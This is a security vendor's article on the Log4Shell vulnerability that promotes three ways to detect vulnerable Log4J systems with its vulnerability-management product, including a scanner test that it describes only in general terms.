What is Log4Shell vulnerability and how to identify it?

Recently the vulnerability known as Log4Shell or LogJam made it to many headlines soon after it was disclosed by Apache on Friday, December 10, 2021. We already explained in our previous articles how attackers are trying to exploit Log4Shell and how companies using Log4J2 shouldn’t just patch, but also begin incident response.

Patching all the vulnerable systems would be easy if you know all the systems that require patching, and manually verifying each system for Log4J and its version could take too long. This article gives guidance how to easily identify Log4J vulnerabilities with F-Secure Elements Vulnerability Management. The solution lets you continuously discover and scan assets in the network. You can identify, categorize, report and prioritize fixing vulnerabilities in systems, software and applications in the network.

F-Secure included Apache Log4J vulnerabilities (CVE-2021-44228, CVE-2021-45046) to its vulnerability definitions database on December 15 allowing you to easily use F-Secure Elements Vulnerability Management solution to scan and identify vulnerable Log4J systems. Complete vulnerability coverage can be checked from the news section that lists all newly added vulnerability definitions.

Three easy methods to identify vulnerable Log4J

You can easily have full visibility into potential Log4J vulnerabilities with F-Secure Elements Vulnerability Management. You can scan systems for vulnerable software versions, scan for vulnerable libraries or test systems with a harmless exploit.

Three easy methods to identify vulnerable Log4J

Method 1: Detect vulnerable applications and version numbers

Use F-Secure Elements Vulnerability Management to scan systems for vulnerable software versions. Installed applications and version numbers that are vulnerable within the network can be detected by running a system scan with authenticated system scanning method, or alternatively across all managed endpoints regardless the network location by using vulnerability scan with the multi-functional F-Secure Elements Agents on endpoints also delivering endpoint protection and EDR capabilities. In the example below, VMware vCenter Server is affected by a remote code execution vulnerability introduced with Log4J vulnerability.

Three easy methods to identify vulnerable Log4J: method 1

Method 2: Scan systems for vulnerable Log4J libraries

Authenticated system scans can be used to identify vulnerable Log4J libraries on both Windows and Linux systems. The system scan will crawl through local hard disks and reports back vulnerable Log4J libraries. The example below found vulnerable Apache Log4J libraries from a Linux system making it easy to prioritize upgrade actions across vulnerable systems.

Three easy methods to identify vulnerable Log4J: method 2

Method 3: Test services against Log4J exploitation

Another method to detect this vulnerability by using F-Secure Elements Vulnerability Management solution is a harmless exploit test. This method is using unauthenticated system scans and a harmless exploit to scan all web services and web service ports (e.g. 80, 443, 8080, 8081 or 8085) by testing if those are vulnerable. This detection is performed by injecting harmless jndi:ldap expression in the HTTP request, listens the signs of successful exploitation, and reports back results to F-Secure Elements Vulnerability Management solution for easy prioritization. As result, you have a complete list of systems within your network running an old version of Log4J with port numbers and remediation action to update Log4J to the latest version.

Three easy methods to identify vulnerable Log4J: method 3

Find your Log4J vulnerabilities before anyone else does

New customers can start a 30-day free F-Secure Elements trial at f-secure.com/elements and then request to enable Vulnerability Management functionality to your trial including Endpoint Protection and EDR as default. If you already run F-Secure Elements without vulnerability management capabilities, it’s easy to activate vulnerability management functionality by simply switching the subscription to have those capabilities automatically activated on all endpoints already running F-Secure Elements Agent.

You can also use F-Secure Elements Endpoint Protection solution to identify other outdated software and apply new versions, and F-Secure Elements EDR solution to automatically detect any attacks that have bypassed the preventive measures, regardless of Log4j vulnerability or other methods used in those attacks.

For technical audience, F-Secure experts have put together a list of indicators of compromise where scanning, exploitation or subsequent payload delivery after Log4J exploitation in continuously updated technical community article how F-Secure continues to add detection capabilities for Log4J. F-Secure’s Incident Response team has also created a post with some additional information on the vulnerability.